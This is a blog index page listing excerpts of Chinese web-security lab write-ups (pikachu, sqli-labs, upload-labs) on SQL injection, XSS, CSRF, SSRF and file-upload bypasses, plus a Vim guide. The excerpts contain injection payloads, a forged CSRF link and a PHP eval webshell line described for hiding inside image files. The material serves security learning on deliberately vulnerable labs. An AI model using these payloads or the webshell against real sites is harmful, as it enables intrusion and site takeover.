- 博客(42)
- 收藏
- 关注
原创 VIM编辑器使用
VIM编辑器使用Vim编辑器的三种工作模式:命令模式(默认模式):复制,粘贴,剪切,切换到其他模式。输入模式(编辑模式):a\i\o,针对每个字符进行编辑,删除。末行模式(扩展模式):保存,退出,保存并退出,字符替换等。命令模式: 向下翻页:Page Down或Ctrl+F 向上翻页:Page Up或Ctrl+B 行内快速跳转 跳转至行首:Home键或者“^”、数字“0” 跳转到行尾:End键或“$”键 行间快速跳转 跳转到文件首行:1G或者gg 跳转到文件末行:G #G 其中
2021-08-31 09:42:30
229
原创 pikachu的SSRF
pikachu的SSRFSSRF(curl)打开pikachu,点击页面a标签,可以看到上传了一个url到后台。2. 直接查看后端代码,可以看到它是用get获取了前端的url请求,curl_init函数会对它进行初始化,然后curl_exec函数会去执行请求,最终又将请求结果返回到前端。3. 接着我们将上传的url修改为http://www.baidu.com,可以看到页面显示出了百度的数据库 (它的流程和分析的源代码流程是一样的,前端传入参数,后端通过curl_exec去请求百度,最后把请
2021-08-21 15:22:55
401
1
原创 SSRF-服务端请求伪造
SSRF-服务端请求伪造1.SSRF是什么?SSRF(Server-side Request Forge, 服务端请求伪造)。由攻击者构造的攻击链接传给服务端执行造成的漏洞,一般用来在外网探测或攻击内网服务。2.SSRF可以做什么?扫内网。向内部任意主机的任意端口发送精心构造的Payload 。DOS攻击(请求大文件,始终保持连接Keep-Alive Always)。攻击内网的web应用,主要是使用GET参数就可以实现的攻击(比如struts2,sqli等)。利用file协议读取本地文件
2021-08-21 15:14:12
208
原创 Pikachu的CSRF
Pikachu的CSRFCSRF(GET)1.首先登录任意账号vince/allen/kobe/grady/kevin/lucy/lili,密码均为123456,并尝试修改个人信息,在控制台可以看到请求URL。2.根据URL的构造形式,伪造URL并诱骗用户点击,从而实现CSRF攻击。例如这里黑客可以伪造URL把目标用户邮箱修改为黑客邮箱:127.0.0.1/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=55555&
2021-07-31 09:52:23
293
原创 CSRF-跨站请求伪造
CSRF1.CSRF是什么?Cross-site request forgery简称为“CSRF”,跨站请求伪造,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行攻击,用户一旦点击了这个请求,整个攻击也就完成了,所以CSRF攻击也被称为“one click”攻击。2.CSRF可以做什么?攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购买商品,虚拟货币转账…造成的问题包括:个人隐私泄露以及
2021-07-31 09:38:30
85
原创 pikachu的XSS
XSS反射型XSS(get)来看一下pikachu平台上的反射型XSS漏洞.1.根据测试流程先输入一组字符。返回提示并不知道。2.来查看一下网络的源代码Ctrl+U。按住Ctrl+F找到刚才输入的字符。3.尝试在输入框中输入一段script的代码,首先我们使用火狐浏览器的插件将输入框中可输入的字符串长度改长。然后在其中输入一个script的代码添加一个警告框alert。<script>alert("xss")</script>反射型XSS(post)1.在
2021-07-19 14:51:07
443
1
原创 XSS的基础知识
XSS一、简述跨站脚本(英语:Cross-site scripting,通常简称为:XSS)是一种网站应用程序的安全漏洞攻击。XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、 LiveScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页
2021-07-19 14:28:19
686
原创 sqli-labs/Less-2注入
sqli-labs/Less-2注入sqli-lsbs第二关1、先判断是字符型还是数字型。http://127.0.0.1/sqli-labs/Less-2/?id=4127.0.0.1/sqli-labs/Less-2/?id=1 and 1=2结果一样,说明是数字型。2、确认字段位数http://127.0.0.1/sqli-labs/Less-2/?id=3 order by 4127.0.0.1/sqli-labs/Less-2/?id=3 order by 3一
2021-06-30 20:53:49
119
原创 sqli-labs/Less-1注入
sqli-labs/Less-1注入Sali-lsbs第一关1、先判断是字符型还是数字型。127.0.0.1/sqli-labs/Less-1/?id`=1127.0.0.1/sqli-labs/Less-1/?id=1 and 1=2说明是字符型。2、确认字段位数127.0.0.1/sqli-labs/Less-1/?id=1' order by 3--+127.0.0.1/sqli-labs/Less-1/?id=3’ order by 4--+一共3位3、判断信息输
2021-06-29 14:15:17
120
原创 upload-labs pass-14~16
upload-labs pass-14Pass-14先看一下源码(图片马):function getReailFileType($filename){ $file = fopen($filename, "rb"); $bin = fread($file, 2); //只读2字节 fclose($file); $strInfo = @unpack("C2chars", $bin); $typeCode = intval($strInfo['chars1']
2021-06-26 17:26:10
279
1
原创 upload-labs pass-12
upload-labs pass-12Pass-12先看一下源码(白名单验证–GET型0x00截断):$is_upload = false;$msg = null;if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1
2021-06-25 16:42:10
393
2
原创 upload-labs pass-11
upload-labs pass-11Pass-11先看一下源码(黑名单绕过–双写绕过):$is_upload = false;$msg = null;if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","
2021-06-24 10:53:09
82
2
原创 upload-labs pass-10
upload-labs pass-10Pass-10先看一下源码(黑名单绕过–“. .”):$is_upload = false;$msg = null;if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pH
2021-06-24 10:49:32
269
1
原创 upload-labs pass-09
upload-labs pass-09Pass-09先看一下源码(黑名单绕过–特殊字符::$DATA绕过):$is_upload = false;$msg = null;if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".p
2021-06-24 10:39:41
203
1
原创 upload-labs pass-08
upload-labs pass-08Pass-08先看一下源码(黑名单绕过–点号绕过):$is_upload = false;$msg = null;if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp
2021-06-24 10:36:18
210
原创 upload-labs pass-07
upload-labs pass-07Pass-07先看一下源码(黑名单绕过–空格绕过):$is_upload = false;$msg = null;if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp
2021-06-24 10:32:55
229
原创 upload-labs pass-06
upload-labs pass-06Pass-06先看一下源码(黑名单绕过–大小写绕过):$is_upload = false;$msg = null;if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pH
2021-06-23 09:51:06
211
1
原创 upload-labs pass-05
upload-labs pass-05Pass-05先看一下源码(黑名单验证-.user.ini):$is_upload = false;$msg = null;if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",
2021-06-22 20:19:39
101
原创 upload-labs pass-04
upload-labs pass-04Pass-04先看一下源码(黑名单绕过–.htaccess):$is_upload = false;$msg = null;if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array(".php",".php5",".php4",".php3",".php2",".php1",".html",".htm",".phtml",".pht"
2021-06-22 15:36:12
167
2
原创 upload-labs pass-03
upload-labs pass-03Pass-03先看一下源码(黑名单绕过):$is_upload = false;$msg = null;if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array('.asp','.aspx','.php','.jsp'); $file_name = trim($_FILES['upload_file']['name']
2021-06-22 15:05:22
110
原创 upload-labs pass-02
upload-labs pass-02Pass-02先看一下源码:$is_upload = false;$msg = null;if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FI
2021-06-22 11:11:38
100
原创 upload-labs pass-01
upload-labs第一关level1第一种根据提示这是本地js文件上传绕过,将浏览器中的js检验代码删除。第二种将一句话木马的后缀改成可以上传的文件类型,利用burp suit抓包再改包绕过js。<?phpphpinfo();?>改包过程。上传成功。...
2021-06-22 10:39:41
84
原创 sqli-labs/Less-4注入
sqli-labs/Less-4注入Sali-lsbs第四关1、先判断是字符型还是数字型。http://127.0.0.1/sqli-labs/Less-4/?id=1127.0.0.1/sqli-labs/Less-4/?id=1 and 1=2结果一样,说明是字符型。2、确认字段位数127.0.0.1/sqli-labs/Less-4/?id=1"查看错误信息:You have an error in your SQL syntax; check the manual th
2021-06-20 11:24:34
95
原创 sqli-labs/Less-3注入
sqli-labs/Less-3注入Sali-lsbs第三关1、先判断是字符型还是数字型。127.0.0.1/sqli-labs/Less-3/?id=1 and 1=2那我们继续来用单引号来试 ’127.0.0.1/sqli-labs/Less-3/?id=1'细心的会发现相比第一关多出了一个 )127.0.0.1/sqli-labs/Less-3/?id=1)127.0.0.1/sqli-labs/Less-3/?id=1')%20 union select 1,2,3,4-
2021-06-20 11:04:07
95
原创 sqli-labs/Less-2注入
sqli-labs/Less-2注入Sali-lsbs第二关1、先判断是字符型还是数字型。http://127.0.0.1/sqli-labs/Less-2/?id=4127.0.0.1/sqli-labs/Less-2/?id=1 and 1=2结果一样,说明是数字型。2、确认字段位数http://127.0.0.1/sqli-labs/Less-2/?id=3 order by 4127.0.0.1/sqli-labs/Less-2/?id=3 order by 3一
2021-06-20 10:44:15
125
原创 sqli-labs/Less-1注入
sqli-labs/Less-1注入Sali-lsbs第一关1、先判断是字符型还是数字型。127.0.0.1/sqli-labs/Less-1/?id=1127.0.0.1/sqli-labs/Less-1/?id=1 and 1=2说明是字符型。2、确认字段位数127.0.0.1/sqli-labs/Less-1/?id=1' order by 3--+127.0.0.1/sqli-labs/Less-1/?id=3’ order by 4--+一共3位。3、判断信息输
2021-06-20 10:25:16
101
原创 pikkachu的“http header”注入
pikkachu的“http header”注入一、原理有时候后台开发人员为了验证客户信息(比如cookie验证)或者通过http header头信息获取客户端的一些信息,比如useragent、accept字段等 会对客户端的http header信息进行获取并使用sql进行处理,如果此时没有足够的安全考虑则可能会导致基于http header 的sql注入漏洞。二、实操首先登陆 admin/1234561.UA头发现有对头部信息的获取,所以可能存在注入,抓包,发送到Repeater。
2021-06-18 16:42:31
745
原创 pikachu的盲注(base on boolian)
pikachu的盲注(base on boolian)发现只能存在kobe’ and 1=1 #连or 都会报错利用and来构造payload:kobe' and ascii(substr(database(),1,1))=112#利用burpsuit来进行测试,爆出database,不对的话就会出现用户名不存在,正确的话就会出现用户正确信息,可采用二分法来减少盲注次数。...
2021-06-15 15:01:02
1526
7
原创 pikachu的delete注入
pikachu的delete注入基于delete下的报错删除的时候设置代理,抓包。将其发送到Repeater,然后改包,将id后面的数字改掉,由于是get的类型的 在payload记得进行url编码payload:or updatexml(2,concat(0x7e,(database())),0)编码之后,可以看到空格变为了加号,点击Send,得到数据库pikachu。...
2021-06-15 14:54:21
1066
原创 Pikachu的”insert/update”注入
Pikachu的”insert/update”注入一、相关函数UpdateXML(xml_target,xpath_expr,new_xml)#此函数将xml_target中用xpath_expr路径匹配到XML片段用new_xml替换,然后返回更改后的XML。#xml_target被替换的部分与xpath_expr用户提供的XPath表达式匹配。#如果找不到表达式匹配 xpath_expr项,或者找到多个匹配项,则该函数返回原始 ml_targetXML片段。#所有三个参数都应为字符串。E
2021-06-15 14:47:24
2572
原创 pikachu的盲注(base on time)
pikachu的盲注(base on time)打开pikachu测试平台。先输入一个’ 尝试一下,发现反馈不报错。输入kobe,发现反馈信息不变打开浏览器的开发者工具(F12),控制台,选择网络。输入 kobe’ and sleep(5)#,发现延迟5秒发送。输入错误信息,发现sleep语句不执行这样我们就可以写一个判断kobe’ and if((substr(database(),1,1))=‘?’,sleep(5),null)#输入kobe’ and if((subst
2021-06-14 19:12:06
1177
2
原创 时间盲注小知识
时间盲注小知识1.时间盲注代码存在sql注入漏洞,然而页面既不会回显数据,也不会回显错误信息,语句执行后也不提示真假,我们不能通过页面的内容来判断。这里我们可以通过构造语句,通过页面响应的时长,来判断信息,这既是时间盲注2.时问盲注攻击原理利用sleep()、benchmark()等函数让mysql执行时间变长经常与if(expr1, expr2, expr3)语句结合使用,通过页面的响应时间来判断条件是否正确。if(expr1,expr2, expr3)含义是如果expr1是 True,则返回e
2021-06-14 18:59:28
873
2
原创 pikachu的XX型注入
pikachu的XX型注入一、实例讲解:通过查看源码发现与搜索型类似,但是测试发现拼接闭合的语句不同,查看源码发现是括号闭合,所以可以得到payload的类型是多变的,所以原理方法与搜索型类似,通过构造payload语句来达到注入的目的。但实际渗透测试过程中不可能得到目标网站的源码,这时候就需要根据经验和多测试。比如发现一个输入框,就首先进行单双引号测试aaa” or 1=1# 或者 aaa) or 1=1#等。源码:if(isset($_GET['submit']) && $_GE
2021-06-14 17:02:49
1502
原创 pikachu的搜索型注入
pikachu的搜索型注入一、原理$sql="select * from user where password like '%$pwd%' order by password"“%”匹配任何字符,“like”的意思就是像,这句SQL的语句就是基于用户输入的pwd在users表中找到相应的password,正常用户当然会输入例如admin,ckse等等。构造对应的闭合,闭合前面的单引号和百分号,注释后面的百分号和单引号。构造的payload如下xxxx%’ or 1=1#二、操作打开进入界面
2021-06-14 16:52:34
828
原创 pikachu的SQL注入
pikachu的SQL注入数字型注入(POST)因为是数字性不需要加字符测试。 把BurpSuite 中拦截的包发到 Repeater 中,修改id参数的值,查看响应结果。可以看到取出了数据库中全部数据,说明存在数字型注入漏洞。猜测网站源码中的SQL语句为:$query="select username,email from member where id=$id"由此可以构造语句:select username,email from member where id = 1 or 1 = 1
2021-06-14 16:41:34
147
原创 SQL注入小知识
SQL注入小知识数据库小知识:在MySQL5.0以上内置了一个数据库information_ schema三张表:schemata:保存了当前服务器上所有的数据库名,字段schema_ nametables: table_ name 字段保存了所有的表名,table_ schema 保存了所有的库名columns: table_ name 字段保存了所有的表名,table_ schema 保存了所有的库名,column_ name 保存了所有的字段名limit m,n:m是指记录开始的位置,n
2021-06-11 19:44:17
108
原创 HTTP协议请求方法
HTTP协议请求方法HTTP规范定义了8种可能的请求方法:get:向特定资源发出请求(请求指定页面信息,并返回实体主体) 。post:向指定资源提交数据进行处理请求(提交表单、上传文件) ,又可能导致新的资源的建立或原有资源的修改。head:与服务器索与get请求一致的相应,响应体不会返回,获取包含在小消息头中的原信息(与get请求类似,返回的响应中没有具体内容,用于获取报头)。put:向指定资源位置上.上传其最新内容(从客户端向服务器传送的数据取代指定文档的内容),与post的区别是put为幂等
2021-06-11 18:10:43
209
原创 木马制作——图片木马制作
木马制作——图片木马制作一、简单说明图片木马指的是图片格式的文件木马,图片格式包括jpg,png等,原理是将木马程序和图片捆绑在一起,达到伪装的目的,程序可以是脚本语言或者编译语言,在web渗透中,通常将脚本编写的webshell和图片合成一个新的木马,结合web的文件上传漏洞进行利用,获取网站应用的webshell权限。二、制作方式利用windows 命令准备一个木马,以php一句话为例,文件名为pass.php,内容如下:<?php@eval($_POST['pass']);?
2021-06-09 18:00:39
12135
6
原创 windows下wafw00f安装使用
windows下wafw00f安装使用1、介绍检测waf类型的一款工具,经常更新,效果还不错2、下载https://github.com/EnableSecurity/wafw00f3、安装进入cmd,进入你解压出来的文件路径python setup.py install安装后会多出一个文件夹:进入cmd,进入你解压出来的文件路径, 进入里面,运行main.pycd wafw001python main.py4、使用用命令试试python main.py –help
2021-06-09 10:14:12
1036
原创 http响应码
http响应码1xx:信息,请求收到,继续处理2xx:成功,行为被成功地接受、理解和采纳3xx:重定向,为了完成请求,必须进一步执行的动作4xx:客户端错误5xx:服务器错误在渗透中常用的的响应码有以下几种:200 存在文件3xx 均可能存在403 存在文件夹404 不存在文件及文件夹405 (方法禁用) 禁用请求中指定的方法。500 均可能存在...
2021-06-08 11:11:14
61
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人